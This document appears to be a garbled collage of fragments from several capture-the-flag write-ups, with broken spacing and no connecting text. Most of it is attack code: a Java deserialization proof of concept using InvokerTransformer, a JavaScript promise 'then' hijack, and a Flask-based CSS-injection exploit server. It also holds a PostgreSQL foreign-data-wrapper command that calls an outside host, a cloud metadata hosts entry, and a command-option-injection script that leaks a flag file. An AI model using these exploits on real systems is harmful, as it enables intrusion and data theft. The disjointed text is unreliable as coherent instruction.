publicclassPoc{ publicstaticvoidmain(String[] args)throws Exception{ ByteArrayOutputStream baos = new ByteArrayOutputStream(); ObjectOutputStream oos = new ObjectOutputStream(baos);
Constructor con = InvokerTransformer.class.getDeclaredConstructor(String.class); con.setAccessible(true); // need a public method InvokerTransformer transformer = (InvokerTransformer) con.newInstance("connect");
What if line 2 is executed but line 3 is NEVER executed? It is possible.
In line 2, we are await-ing the execution of setRoutes function. Do you know async/await in ECMAScript is just a syncax sugar of Promise? So, we can transform this function to the following equivalent code.
The key is that the code is calling the chained method then() from the returned value of setRoutes function. What is the return value of this function?
It is returning the result of session.routes. This is unnecessary since the assignment to session.route is already done.
Okay, we can control this value by salt parameter. What if we set salt = 'then'? It will return the following object.
1 2 3 4
>{ // redacted then: () => salt, >}
As you can infer from the above code, this then method will be called with callback function as an argument. If the function is called, the returned value is considered to be resolve-ed and the process continues. But, this then() method is just ignoring the argument and the function is never called.
So, by setting salt = 'then', the assignment to session.routes happens inside setRoutes function, but setRoute function is not resolved and the assignment to session.salt never happens.
So, send GET /?action=SetSalt&data=then to server and this will result in the following session state.
type Post struct { ID string`gorm:"primaryKey"` UID string`gorm:"column:uid"` Title string`gorm:"column:title"` Description string`gorm:"column:description"` CreatedAt time.Time `gorm:"column:created_at"` }
db, err := gorm.Open(sqlite.Open("database.db"), &gorm.Config{}) if err != nil { log.Fatalf("failed to open a database: %s", err.Error()) } db.AutoMigrate(&Post{})
@app.route("/start") defstart(): p = build_payload("", CHAR_CANDIDATES) exploit_id = post_note("exploit", p) report_note_as_stylesheet(exploit_id) print("[info]: started exploit with a new note: {}/notes/{}".format(TARGET_BASE, exploit_id)) return""
p = build_payload(leaked_id, CHAR_CANDIDATES) exploit_id = post_note("exploit", p) report_note_as_stylesheet(exploit_id) print("[info]: invoked crawler with a new note: " + exploit_id) return""
if __name__ == "__main__": print("[info] running app ...") app.run(host="0.0.0.0", port=1337)
CREATE SERVER q FOREIGN DATA WRAPPER mysql_fdw OPTIONS(host'ccreater.top',port'63306') CREATE USER MAPPING FOR realuser SERVER q OPTIONS (username 'a', password 'a'); CREATE FOREIGN TABLE c (id int)SERVER q OPTIONS(dbname 'a',table_name 'a') select * from c
if ( ( ( '#NONE#' !== $metakeyselect ) && ! empty( $metakeyselect ) ) || ! empty( $metakeyinput ) ) { /* * We have a key/value pair. If both the select and the input * for the key have data, the input takes precedence. */ if ( '#NONE#' !== $metakeyselect ) { $metakey = $metakeyselect; }
# /etc/hosts: Local Host Database # # This file describes a number of aliases-to-address mappings for the for # local hosts that share this file. # # In the presence of the domain name service or NIS, this file may not be # consulted at all; see /etc/host.conf for the resolution order. #
# IPv4 and IPv6 localhost aliases 127.0.0.1 localhost ::1 localhost
# # Imaginary network. #10.0.0.2 myname #10.0.0.3 myfriend # # According to RFC 1918, you can use the following IP networks for private # nets which will never be connected to the Internet: # # 10.0.0.0 - 10.255.255.255 # 172.16.0.0 - 172.31.255.255 # 192.168.0.0 - 192.168.255.255 # # In case you want to be able to connect directly to the Internet (i.e. not # behind a NAT, ADSL router, etc...), you need real official assigned # numbers. Do not try to invent your own network numbers but instead get one # from your network provider (if any) or from your regional registry (ARIN, # APNIC, LACNIC, RIPE NCC, or AfriNIC.) # 169.254.169.254 metadata.google.internal metadata
defgetInfo(parent,path): r = req(parent,path) if r.status_code == 500: return print(parent+path) print(r.text) print("----------------------------------------------------------------------") ifnot path.endswith("/"): return child = r.text.splitlines() parent=parent+path for i in child: getInfo(parent,i)
if __name__ == "__main__": s1 = requests.Session()
# create a session resp = req(s1, "/")
# use create playlist to generate the command `mkdir -p ./--output=/tmp/vakzz_in` req(s1, "/?args=-p ./--output=/tmp/vakzz_in&op=create")
# also create a `-z` folder req(s1, "/?args=./-z&op=create")
# use `--` so that the remaining args are not treated as options, will run `ls -- -z --output=/tmp/vakzz_in /flag/` # since all of these folders exist ls will exit cleanly and add our args to the queue req(s1, "/q/add?args=-- -z --output=/tmp/vakzz_in /flag/")
# remove the `--` from the queue req(s1, "/q/skip")
# shuffle the queue which will run `shuf -e -z --output=/tmp/vakzz_in /flag/` # this writes final argument as a null terminated string to the specified output file req(s1, "/q/shuf")
# now /tmp/vakzz_in contains `/flag/\x00`
# rate limit time.sleep(10)
# new session as need more playlists s2 = requests.Session() resp = req(s2, "/")
# create the folder `--files0-from=/tmp/vakzz_in` for option injection req(s2, "/?args=-p ./--files0-from=/tmp/vakzz_in&op=create")
# create the folder `--exclude=flag?[1-9]*` for option injection req(s2, "/?args=./--exclude=flag?[1-9]*&op=create")
# now `--files0-from=/tmp/vakzz_in` and `--exclude=flag?[1-9]*` are both in the names array and can be used in args
# use stat to run `du` with our injection options, causing it to look at folders from /tmp/vakzz_in and exclude # anything that matches the supplied pattern: `du -sh --files0-from=/tmp/vakzz_in --exclude=flag?[1-9]*` resp = req(s2, "/?args=--files0-from=/tmp/vakzz_in --exclude=flag?[1-9]*&op=stat")
# if the flag was excluded then this will return `8.0K /flag/` otherwise `16K /flag/`, letting us know if # the flag starts with 0-9 or a-f. print(resp.text.split('<div class="field-row"><label>')[2].split(" ")[0])
from flask import Flask, render_template, request, flash, redirect, send_file,session,render_template_string import os import re from hashlib import md5 import yaml